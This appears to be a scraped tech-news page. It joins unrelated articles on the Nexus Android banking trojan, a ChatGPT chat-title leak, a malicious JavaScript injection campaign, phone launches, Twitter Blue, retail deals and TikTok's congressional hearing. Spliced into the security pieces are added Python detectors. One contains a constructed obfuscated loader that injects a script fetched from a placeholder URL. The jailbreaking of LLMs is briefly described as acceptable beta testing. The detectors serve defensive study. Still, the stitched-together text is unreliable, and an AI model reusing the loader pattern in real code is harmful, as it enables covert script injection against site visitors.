It first appeared in June last year and is now being openly advertised by its creators on hacker forums to increase its reach. Nexus’ primary targets are 450 banking and cryptocurrency apps.
It’s being distributed through phishing websites posing as legitimate websites of YouTube Vanced, a discontinued third-party YouTube app. It uses all the tricks in the book to gain your banking info and take over your financial accounts.
Nexus asks for 50 permissions and abuses at least 14 of them
It is capable of performing overlay attacks, i.e. replicating a legitimate interface to trick you into entering your credentials, and uses keylogging to record your keystrokes. It can even steal SMS messages to get access to two-factor authentication codes and can abuse Accessibility Services to steal information from crypto wallets, 2-Step Verification codes generated by Google Authenticator, and website cookies. The trojan can also delete messages received by you.
After it’s installed on a device, Nexus connects to its command-and-control (C2) server. C2s are used by cybercriminals to control malware, launch attacks, and receive stolen data.
Nexus is said to be in the beta stage but it’s already being used by many threat actors to carry out nefarious activities. Cybercriminals who do not know how to make their own malware can rent it for $3,000 a month.
It looks like the developer is from a CIS (Commonwealth of Independent States) country and has prohibited the trojan’s use in Azerbaijan, Armenia, Belarus, Kazakhstan, Kyrgyzstan, Moldova, Russian Federation, Tajikistan, Uzbekistan, Ukraine, and Indonesia.
Nexus is capable of updating itself and Cleafy thinks it is a real threat and can infect hundreds of Android devices in the world.
To protect yourself from infections, try to only download apps from Google Play and enable Google Play Protect. Use strong passwords and enable biometric security features where possible and be very careful when granting permissions.
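The permission and Accessibility Services abuse described above can be checked for on a device you administer. The following is an added example, not Cleafy’s tooling or anything from the original article: it parses the output of `adb shell dumpsys package <pkg>` and the value of `adb shell settings get secure enabled_accessibility_services` (both real commands; the sample text below is constructed in their shape) and flags granted permissions that enable overlays, SMS interception or self-installation. The package name and service name are placeholders, and the permission-to-risk mapping is the example’s own.

```python
# Real Android permission names that enable the behaviour described above, with the
# defender-facing reason each one matters. (Mapping added for this example, not from Cleafy.)
HIGH_RISK_PERMISSIONS = {
    "android.permission.SYSTEM_ALERT_WINDOW": "can draw over other apps: overlay attacks",
    "android.permission.READ_SMS": "can read stored SMS, including 2FA codes",
    "android.permission.RECEIVE_SMS": "can intercept incoming SMS, including 2FA codes",
    "android.permission.SEND_SMS": "can send SMS from the device",
    "android.permission.REQUEST_INSTALL_PACKAGES": "can install APKs: self-update",
}

# Constructed sample shaped like 'adb shell dumpsys package <pkg>' output for a
# hypothetical app; the package name is a placeholder, not a real Nexus sample.
SAMPLE_DUMPSYS = """\
Packages:
  Package [com.example.lookalike] (a1b2c3d):
    userId=10234
    versionName=1.0
    requested permissions:
      android.permission.INTERNET
      android.permission.READ_SMS
      android.permission.RECEIVE_SMS
      android.permission.SYSTEM_ALERT_WINDOW
      android.permission.REQUEST_INSTALL_PACKAGES
      android.permission.READ_CONTACTS
    install permissions:
      android.permission.INTERNET: granted=true
      android.permission.SYSTEM_ALERT_WINDOW: granted=true
      android.permission.REQUEST_INSTALL_PACKAGES: granted=true
    runtime permissions:
      android.permission.READ_SMS: granted=true, flags=[ USER_SET|USER_SENSITIVE_WHEN_GRANTED]
      android.permission.RECEIVE_SMS: granted=true, flags=[ USER_SET]
      android.permission.READ_CONTACTS: granted=false, flags=[ USER_SET]
"""

# Constructed sample of 'settings get secure enabled_accessibility_services':
# colon-separated package/service pairs. The first entry is the hypothetical app.
SAMPLE_A11Y = (
    "com.example.lookalike/com.example.lookalike.A11yService:"
    "com.android.talkback/com.google.android.marvin.talkback.TalkBackService"
)


def _sections(dumpsys_text):
    """Yield (section, line) pairs; a section starts at a line ending in ':'."""
    section = None
    for raw in dumpsys_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.endswith(":"):
            section = line[:-1].lower()
            continue
        yield section, line


def requested_permissions(dumpsys_text):
    """Every permission the app declares in its manifest, granted or not."""
    return [line for sec, line in _sections(dumpsys_text) if sec == "requested permissions"]


def granted_permissions(dumpsys_text):
    """Install-time and runtime permissions that are currently granted."""
    granted = set()
    for sec, line in _sections(dumpsys_text):
        if sec in ("install permissions", "runtime permissions"):
            name, _, state = line.partition(":")
            if "granted=true" in state:
                granted.add(name.strip())
    return granted


def accessibility_packages(settings_value):
    """Packages with an enabled accessibility service ('null' means none)."""
    if not settings_value or settings_value.strip() == "null":
        return set()
    return {entry.split("/", 1)[0] for entry in settings_value.strip().split(":") if entry}


def assess(package, dumpsys_text, accessibility_value):
    """Summarise the risky capabilities an installed app actually holds right now."""
    requested = requested_permissions(dumpsys_text)
    granted = granted_permissions(dumpsys_text)
    return {
        "package": package,
        "requested_count": len(requested),
        "high_risk_granted": {
            p: HIGH_RISK_PERMISSIONS[p] for p in sorted(granted) if p in HIGH_RISK_PERMISSIONS
        },
        "accessibility_service_enabled": package in accessibility_packages(accessibility_value),
    }


if __name__ == "__main__":
    print(assess("com.example.lookalike", SAMPLE_DUMPSYS, SAMPLE_A11Y))
```

An app that holds SMS and overlay permissions and has an enabled accessibility service, while claiming to be a video player, is exactly the profile the text describes; the check does not prove malice, but it tells you which grants to revoke first.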
ChatGPT suddenly started showing users the titles of other users’ chats.
New gadgets and software come with new bugs, especially if they’re rushed. We can see this very clearly in the race between tech giants to push large language models (LLMs) like ChatGPT and its competitors out the door. In the most recently revealed LLM bug, ChatGPT allowed some users to see the titles of other users’ conversations.
LLMs are huge deep neural networks, which are trained on the input of billions of pages of written material.
In the words of ChatGPT itself:
“The training process involves exposing the model to vast amounts of text data, such as books, articles, and websites. During training, the model adjusts its internal parameters to minimize the difference between the text it generates and the text in the training data. This allows the model to learn patterns and relationships in language, and to generate new text that is similar in style and content to the text it was trained on.”
We have written before about tricking LLMs into behaving in ways they aren’t supposed to. We call that jailbreaking. And I’d say that’s fine. It’s all part of what could be seen as a beta-testing phase for these complex new tools. And as long as we report the ways in which we are able to exceed the limitations of the model and give the developers a chance to tighten things up, we’re working together to make the models better.
But, when a model spills information about other users we stumble into an area that should have been sealed off already.
To understand better what has happened, it is necessary to have some basic working knowledge about how these models work. To improve the quality of the responses they get, users can organize the conversations they have with the LLM into a type of thread, so that the model, and the user, can look back and see what ground they have covered and what they are working on.
With ChatGPT, each conversation with the chatbot is stored in the user’s chat history bar where it can be revisited later. This gives the user an opportunity to work on several subjects and keep them organized and separate.
The history was unavailable for a while
Showing this history to other users would, at the very least, be annoying and unacceptable, because it could be embarrassing or even give away sensitive information.
Did I ask ChatGPT what to get my wife for Valentine’s Day?
Nevertheless, this is exactly what happened. At some point, users started noticing items in their history that weren’t their own.
Although OpenAI reassured users that others could not access the actual chats, users were understandably worried about their privacy.
OpenAI CEO Sam Altman said the company feels “awful”, but the “significant” error has now been fixed.
Things to remember
Giant, interactive LLMs like ChatGPT are still in the early stages of development and, despite what some want us to believe, they are neither the answer to everything nor the end of the world. At this point they are just very limited search engines that rephrase what they found about the subject you asked about, whereas an “old-fashioned” search engine shows you possible sources of information and lets you decide which ones are trustworthy and which ones aren’t.
When you are using any of the LLMs, remind yourself that they are still very much in a testing phase. Which means:
Do not feed it private or sensitive information about yourself or your employer. Other leaks are likely and may be even more embarrassing.
Take the results with more than just a grain of salt. Because the models don’t provide sources of information, you can’t know where its ideas came from.
Make yourself familiar with the LLM’s limitations. It helps to understand how up to date the information it uses is and the subjects it can’t converse freely about.
Researchers from Unit 42 have been monitoring a widespread campaign of harmful JavaScript (JS) injections. The campaign aims to redirect unsuspecting victims to dangerous content, including adware and fraudulent pages.
Websites continue to be infected by this threat in 2023, as it was active throughout 2022. The malicious JS code was discovered on over 51,000 websites, with several hundred appearing in Tranco’s top 1 million ranked websites.
The potential impact of this campaign is significant, as the presence of affected websites in Tranco suggests a widespread reach.
The campaign’s complexity lies in its multi-stage injection process, which precedes the redirect to harmful web pages. As additional means of evading detection, obfuscation and benign append attacks were employed.
Impact of the campaign on users
Experts have identified multiple versions of a campaign in which threat actors inject malicious JS code into websites. The campaign was observed for the first time during 2020.
170,000 URLs and 51,000 hostnames have been identified as part of this campaign since its inception in 2022.
A peak of over 4,000 daily URLs was generated as a result of this campaign between May and August 2022.
The impact of this campaign has been substantial, with hundreds of infected websites appearing in Tranco’s top one million ranked sites, indicating a potentially wide reach among internet users.
In January 2023, approximately 240,000 website sessions were prevented across 14,773 devices due to blocking measures taken against these websites.
Technical analysis
The injected JS code hides a malicious payload and is obfuscated to evade detection. The obfuscated code also conceals the URL from which a further malicious JS file is loaded.
That malicious JS is added dynamically to the page’s DOM by the injected code itself.
On certain websites, the obfuscated JS snippets were found injected into commonly used utility JS files. Appending malicious code to a large body of benign code, known as a benign append attack, is a common tactic among malware authors.
It lets them evade detection by security crawlers. In each JS snippet, the injected code loads the external malicious JS through DOM manipulation.
Because the external payload can be swapped out at any time, this gives the attacker greater flexibility. In its more recent version, the campaign injects the malicious JS code directly into the website.
Upon executing the final payload, users are redirected to various websites before reaching a destination webpage, often consisting of adware or a fraudulent page.
This page displays false information that may deceive individuals into granting permission for a malicious website to send browser notifications under the control of an attacker.
The researchers at Unit 42 believe that many websites are susceptible to security breaches due to vulnerabilities in one or more CMS plugins.
The researchers at Sucuri have discovered that exactly the same technique was used to exploit CMS plugins in a similar campaign. The threat actors responsible for creating malware have produced multiple variations of the harmful JavaScript code they injected into websites during this campaign.
Detecting different variants of the same attack is a strength of the deep learning techniques often used for intrusion detection.
Applying deep learning techniques to detect malicious JS injections could therefore increase the detection rate.
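The benign append attack and the DOM-based loader described in the technical analysis above can be caught without deep learning when a known-good copy of the utility file exists. The following is an added example, not Unit 42’s or Sucuri’s tooling: it compares a served JS file against its known-good copy, isolates anything appended after the original content, and looks for several co-occurring indicators (script element creation plus DOM insertion, dynamic `src` assignment, `String.fromCharCode`, `atob`, hex-named arrays). The utility script, the appended loader and the `example.invalid` URL are all constructed for this example; no real campaign code is reproduced.

```python
import base64
import hashlib
import re

# Constructed sample: a known-good copy of a site utility script, as the plugin
# vendor ships it (hypothetical content, not any real library).
KNOWN_GOOD_JS = (
    "/* util.js 1.0 */\n"
    "function debounce(fn, ms) {\n"
    "  var t;\n"
    "  return function () { clearTimeout(t); t = setTimeout(fn, ms); };\n"
    "}\n"
    "window.util = { debounce: debounce };\n"
)

# Constructed sample of the loader shape the text describes: a script element is
# created, given an obscured src and appended to the DOM. The URL is a placeholder.
_HIDDEN_URL = base64.b64encode(b"https://example.invalid/loader.js").decode()
APPENDED_LOADER = (
    "var _0x4f2a=['Y3JlYXRl','c2NyaXB0'];(function(){var d=document,"
    "s=d.createElement(String.fromCharCode(115,99,114,105,112,116));"
    "s.src=atob('" + _HIDDEN_URL + "');"
    "d.getElementsByTagName('head')[0].appendChild(s);})();\n"
)
INFECTED_JS = KNOWN_GOOD_JS + APPENDED_LOADER

# Each indicator alone is common in legitimate code; the verdict below only fires
# when several co-occur in content appended after the known-good file.
INDICATORS = {
    "dom_script_insertion": re.compile(
        r"createElement\s*\([\s\S]{0,400}?\.(appendChild|insertBefore)\s*\("
    ),
    "dynamic_src_assignment": re.compile(r"\.src\s*="),
    "charcode_obfuscation": re.compile(r"String\.fromCharCode\s*\("),
    "base64_decode": re.compile(r"\batob\s*\("),
    "hex_identifier_array": re.compile(r"\b_0x[0-9a-f]{3,}\s*=\s*\["),
    "eval_or_function_ctor": re.compile(r"\beval\s*\(|\bnew\s+Function\s*\("),
}


def _normalize(text):
    """Normalise line endings so a CRLF/LF difference is not mistaken for tampering."""
    return text.replace("\r\n", "\n").replace("\r", "\n")


def find_appended_tail(known_good, served):
    """Content appended after the known-good file; '' if identical; None if the served
    file does not start with the known-good content (modified rather than appended)."""
    good, got = _normalize(known_good), _normalize(served)
    if got.startswith(good):
        return got[len(good):]
    return None


def find_indicators(js):
    """Names of the injection/obfuscation indicators present in a JS snippet."""
    return [name for name, rx in INDICATORS.items() if rx.search(js)]


def analyze(known_good, served):
    """Compare a served script with its known-good copy and classify the difference."""
    tail = find_appended_tail(known_good, served)
    if tail is None:
        return {"verdict": "modified", "indicators": find_indicators(served), "appended_sha256": None}
    if tail.strip() == "":
        return {"verdict": "clean", "indicators": [], "appended_sha256": None}
    indicators = find_indicators(tail)
    verdict = "suspicious_append" if len(indicators) >= 2 else "appended_unknown"
    return {
        "verdict": verdict,
        "indicators": indicators,
        # Hash of the appended tail only, so the same loader is recognisable across sites
        "appended_sha256": hashlib.sha256(tail.encode()).hexdigest(),
    }


if __name__ == "__main__":
    for label, served in (("known-good", KNOWN_GOOD_JS), ("infected", INFECTED_JS)):
        print(label, analyze(KNOWN_GOOD_JS, served))
```

The prefix comparison is what makes the benign append case cheap to catch: the known-good content is unchanged, so everything after it is exactly the injected part, and only that part needs scanning. A file that is altered rather than appended to comes back as “modified” and deserves a full diff rather than this heuristic.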
As many of you know by now, Huawei announced its new flagship offerings yesterday. The Huawei Mate X3 foldable smartphone got announced, alongside three Huawei P60 series devices, and the Huawei Watch Ultimate. Some other devices got presented, but these are the ones that stole the show. Well, Huawei has confirmed that global variants of the Mate X3 and P60 series will be coming on May 9.
Global versions of Huawei Mate X3 & P60 series will launch on May 9
Do note that the company reached out to us to confirm it, we haven’t seen it on Huawei’s social media network channels just yet. The company said that the event will take place in Munich, Germany, though we still don’t know at what time exactly. That confirmation will likely come later on.
Just to be clear, the company said that “overseas versions” of “a number of new products” that launched in China, will be announced during this event. It did not name devices specifically, so do note that.
The Huawei Watch Ultimate was already announced for global markets, at the same time as the event in China yesterday. We already know it will go on sale on March 28, and that it will be quite pricey.
The Huawei Mate X3 has a lot to offer from the design standpoint
More people are probably interested in Huawei’s flagship smartphones, though. The Huawei Mate X3 managed to shock us yesterday, as it was announced as the thinnest book-style foldable, and also one of the lightest large foldables in the market. Well, probably the lightest one.
That’s only scratching the surface, though, as the phone truly does have a lot to offer. The Huawei P60 series is also rather interesting. Huawei opted for a somewhat odd naming scheme these days, by introducing the ‘Art’ model as the highest-end P60 device.
It remains to be seen if all three P60 devices will launch in Europe, or just one or two. The Mate X3 will be coming, almost certainly, so get ready for that.
Twitter made two big announcements today. Firstly, its premium subscription service Twitter Blue is now available globally. Anyone can pay the company to unlock some extra features and add a blue tick next to their handle. Second, the social network is removing legacy verified checkmarks starting on April 1. Accounts that were verified before Elon Musk took over the company will lose their blue checkmarks unless they subscribe to Twitter Blue.
Both of these changes have been a long time coming. By a long time, we mean since Twitter changed ownership in late October 2022. Elon Musk made it clear that the company will scrap the existing account verification system and will instead sell the blue tick as part of Twitter Blue, which he sees as a big revenue stream. “The way in which they were given out was corrupt and nonsensical,” the billionaire said about the legacy checkmarks in December. He repeated the “corrupt” remark last month too.
The first part of the plan was to make Twitter Blue available for everyone before removing the legacy blue ticks. The firm has rapidly expanded the subscription system in recent months, finally bringing it to Android in January this year. Today, the service has gone global. “Twitter Blue is now available globally! Sign up today to get your blue checkmark, prioritized ranking in conversations, half ads, long Tweets, Bookmark Folders, custom navigation, Edit Tweet, Undo Tweet, and more,” Twitter Blue tweeted Thursday afternoon.
Twitter will start removing legacy blue checkmarks on April Fool’s Day
With the subscription service available globally, Twitter has announced the second part of the plan as well. Starting this April Fool’s Day, it will no longer honor the coveted checkmark that users earned after meeting several criteria established by the company. Instead, it is forcing them to buy a Twitter Blue subscription to keep the blue tick. “On April 1st, we will begin winding down our legacy verified program and removing legacy verified checkmarks. To keep your blue checkmark on Twitter, individuals can sign up for Twitter Blue,” Twitter Verified tweeted just hours later.
Twitter Blue costs $8 a month ($11 a month if you subscribe through the Android or iOS app). It gives you everything that the company mentioned in the tweet above. You need to verify your identity with a phone number for the blue tick, though. For governmental and organizational accounts, Twitter has introduced a new grey checkmark. Heads of state, ministers, national-level cabinet members, official spokespersons, company headquarters, regional and country-level institutional accounts, and multilateral individuals are among those eligible for grey checkmarks.
OnePlus has confirmed that it will launch two new ‘Nord’ devices on April 4. We already know what products, actually. OnePlus is to blame for that, as it already kind of listed both of them on its website.
OnePlus is planning to launch two ‘Nord’ devices on April 4
The devices in question are the OnePlus Nord CE 3 Lite and the OnePlus Buds 2. OnePlus has already published pictures of both of those devices on its website. The company, however, did not share any other details. We knew about the CE 3 Lite since earlier this month, but the Buds 2 were not confirmed, until now.
These will launch in India, at least at first. They will also be quite affordable, these are ‘Nord’ devices after all. The OnePlus Nord CE 3 Lite will be available in a Pastel Lime color, while the earbuds will sell in Black and White colors. You can check out both devices in the gallery below.
The phone will have two camera islands on the back, hosting three cameras, it would seem. The OnePlus Buds 2, on the other hand, will look basically like the first-gen model. We do expect some improvements on the inside, though, of course.
The phone will include a 120Hz display, 67W charging & a 108MP camera
The company did not share any spec info regarding these products, but the OnePlus Nord CE 3 Lite specs did surface recently. The device will feature a 6.7-inch fullHD+ LCD display, it seems. It will feature a 120Hz refresh rate, by the way.
A 5,000mAh battery was also mentioned, and 67W fast wired charging will be supported. The Snapdragon 695 will fuel the device, while you’ll be able to choose between 6GB and 8GB RAM flavors. Those two models will ship with 128GB and 256GB of internal storage, respectively. Also, the storage will be expandable.
A 108-megapixel main camera will sit on the back. It will be backed by two 2-megapixel units. We still don’t have the details on those. A single 16-megapixel camera will sit on the front.
Android 13 will come pre-installed on the phone, along with OxygenOS 13. You can also expect two SIM card slots to be available. We don’t have the OnePlus Buds 2 details yet.
Today, Amazon has the iRobot Roomba i4+ on sale for $399. That’s going to save you $250 off of the regular price. That is also the cheapest the Roomba i4+ has ever been, making this a really great time to pick one up.
That’s a pretty solid price for the Roomba i4+. iRobot claims that the Roomba i4+ is perfect for those that have pets. That’s because it does not use a single bristle brush, and instead uses the multi-surface rubber brushes that are able to flex to adjust to different floor types. So why is this good for pets? It doesn’t get pet hair tangled in the brush, which is a really big deal honestly.
Other than that, the Roomba i4+ also has all of the features that you’d expect from iRobot. That includes voice commands with Google Assistant and Alexa. There’s also schedules available, so you can have your Roomba clean at specific times, on specific days. iRobot claims that it has about 10x the power-lifting suction power when compared to the Roomba 600 series.
This is the plus model, which means that it also comes with the auto-empty dock. So when the iRobot Roomba i4+ docks, it will go ahead and empty the dustbin. Which is very convenient and it can also hold about 60 days worth of debris before it needs to be emptied.
Whether you’re relaxing at home or out enjoying life, the Roomba i4 plus EVO robot vacuum takes care of stubborn dirt and messes with a Premium 3-Stage Cleaning System and 10x the Power-Lifting Suction. Compared to the Roomba 600 series cleaning system. The Roomba i4 plus EVO takes vacuuming off your mind with personalized cleaning suggestions powered by the unique intelligence of iRobot OS. Learns your habits and your routines.
You can pick up the iRobot Roomba i4+ robot vacuum from Amazon today by clicking here.
The Google Pixel Tablet is set to launch later this year, and we’re all looking forward to it. So far, we know a little bit about how it’s going to look, but we don’t know too much about how it’s going to function. Well, thanks to a leak from 9To5Google, we know a little bit about the Hub Mode for the Pixel Tablet.
Rumor has it that there will be two docks available when the Pixel Tablet launches. One of them will only power the device while the other one will act as a speaker as well. Both of them will put the tablet into Hub Mode. This is when you’ll be using the tablet as a smart display.
Thanks to Snoopy Tech, we have some leaked images of the dock. We’re not sure which variant of the dock we’re seeing, but there’s a chance that it’s the one only for powering it. It looks just like what we’ve seen in the promotional images. It’s predominantly pill-shaped with a fabric material on the outside. On the front of the dock, we see the four connector pins that will hold the tablet.
On the back, we see the Google logo along with the power port. There’s also a Google logo on the bottom. If this model only powers the tablet, then the one with the built-in speaker might be a bit bigger. We’ll just have to wait and see.
Here’s how Hub Mode could look on the Pixel Tablet
This was discovered from an APK deep dive by 9To5Google, so you’ll want to take this with a grain of salt. There are some strings hidden in the Google Home app right now that hint at some of the possible functionality of the Hub Mode. For starters, one string states that when docked, the voice match feature will only apply to the admin. All of the other people will be treated as guests.
The other strings in the app read:
<string name="tky_device_toggle_subtitle_filters">On Pixel Tablets, filters only apply in Hub Mode. %1$s</string>
<string name="tky_filters_subtitle_calls">The calls setting doesn\u2019t apply to Pixel Tablets. %1$s</string>
<string name="tky_filters_subtitle_news">The news setting doesn\u2019t apply to Pixel Tablets. %1$s</string>
<string name="tky_filters_subtitle_podcasts">The podcasts setting doesn\u2019t apply to Pixel Tablets. %1$s</string>
<string name="tky_filters_subtitle_websites">The websites setting doesn\u2019t apply to Pixel Tablets. %1$s</string>
Amazon’s Spring Cleaning Sale is a great time to stock up on all the cleaning supplies you need to get your home ready for spring. With a wide variety of products on sale, you’re sure to find everything you need at a great price.
In this sale, you can save on all sorts of everyday essentials, including paper towels, trash bags, freezer bags, dish soap, adult toilet wipes, scrub sponges and so much more. And the majority of these are 20% or more off of their regular price. So definitely a good time to stock up.
These are mostly Amazon Basics and other Amazon Brands that are on sale. But you can get a 50-pack of 30-gallon trash bags for just $10.30. As far as tall kitchen trash bags go, there are a few options, including a pack of 90 for just $14.16.
If you’re in need of some toilet paper, the Presto mega rolls are here. You’ll get 24 rolls for just $23.76. It’s basically four packs of 6 here. Which is going to give you 96 rolls of regular toilet paper. Definitely a steal here.
When it comes to dish soap, the Amazon Basics Dish Soap is available for $11.98. This price includes four 30 fl oz bottles of dish soap. Speaking of dish soap, Presto also has dishwasher pacs on sale for $13.89. You’ll get 70 pacs for that price, and these are the triple-action detergent pacs. So you don’t even need to rinse your dishes before you put them into the dishwasher, which is really good.
These are just a few of the very many everyday essentials that are currently on sale over at Amazon. Head on over using the link below and stock up your pantry and cabinets with these everyday essentials. You’re going to need them anyways, so might as well buy them now while they are cheap.
TikTok CEO Shou Chew testified before Congress on Thursday amid growing concerns over the app’s future in the US. Lawmakers grilled Chew for more than five hours but the concerns largely remained unanswered. The TikTok executive repeated statements from his written testimony saying that the video-based social media platform or its Chinese parent company ByteDance doesn’t have any backdoors for China’s CCP (Chinese Communist Party) led government, and it did little to satisfy the lawmakers.
TikTok CEO failed to satisfy the US lawmakers at his first Congressional hearing
Calling for a nationwide ban on TikTok, House Energy and Commerce Committee chair and representative Cathy Rodgers said that “ByteDance is beholden to the CCP, and ByteDance and TikTok are one and the same”. She made the remarks in her opening statements during the Congressional hearing yesterday. She suggested that the CCP could gain access to the personal data of American TikTok users through ByteDance. In response, the TikTok CEO, who stated in his written testimony that “ByteDance is not an agent of China,” pointed to Project Texas.
Project Texas is TikTok’s plan to keep data of US users within the US. It has teamed up with Texas-based software company Oracle to safeguard the data in the latter’s servers. The data would be inaccessible to anyone outside the US. Expected to be completed later this year, TikTok officials say this would do more to protect American users than an outright ban for the app. However, the plan has been in the works for over a year now and nothing has materialized. Unsurprisingly, lawmakers are losing patience and trust in the company.
During the hearing, committee members were all skeptical of TikTok’s plan to address America’s national security concerns. Rodgers branded it a “marketing scheme,” while Representative Frank Pallone said, “Project Texas is simply not acceptable”. Representative Angie Craig also echoed these sentiments saying that the plan “doesn’t pass the smell test”. These disagreements continued throughout the nearly six-hour showdown. Chew also frustrated lawmakers by declining to answer several “rapid-fire” questions with a Yes or No.
When asked whether ByteDance was a Chinese company, he said that it’s a “global” firm with a Chinese founder. Similarly, he refused to directly answer whether ByteDance employees had spied on American journalists, something the company admitted doing a few months back. “I don’t think ‘spying’ is the right way to describe it,” Chew said. “This is ultimately an internal investigation”. Of course, this statement sparked sharp criticism. TikTok quickly took to Twitter to point out that Chew firmly said “no” when asked if it spied on behalf of the CCP.
Chew pointed to recent updates when asked about teen safety
The TikTok CEO similarly dodged many other complex questions from Congress members, including one about the inner workings of ByteDance and its China-based employees, Engadget reports. He was also pressed with questions about teen safety. He was asked about the platform’s moderation practices and potentially harmful “challenges” that go viral on the platform.
Chew pointed to various changes and updates TikTok has pushed recently. He talked about the dedicated STEM (science, technology, engineering, and math) feed, screen time limit, and more. The TikTok CEO also mentioned the platform’s newly-added algorithm reset button. Users can make the app forget everything it has learned about them and start afresh, should they feel unsafe with the content they currently see in the algorithmic feed.
However, none of this was enough to address the lawmakers’ national security concerns. Some have called for a sale of TikTok in the US, though Chinese officials have opposed the idea. Chew, meanwhile, said: “We will need to look at this because Project Texas is designed to move forward here in the United States and we are not discussing this”. As things stand, TikTok’s future is uncertain even after the hours-long grilling of its CEO by lawmakers. We’ll have to wait and see what’s next.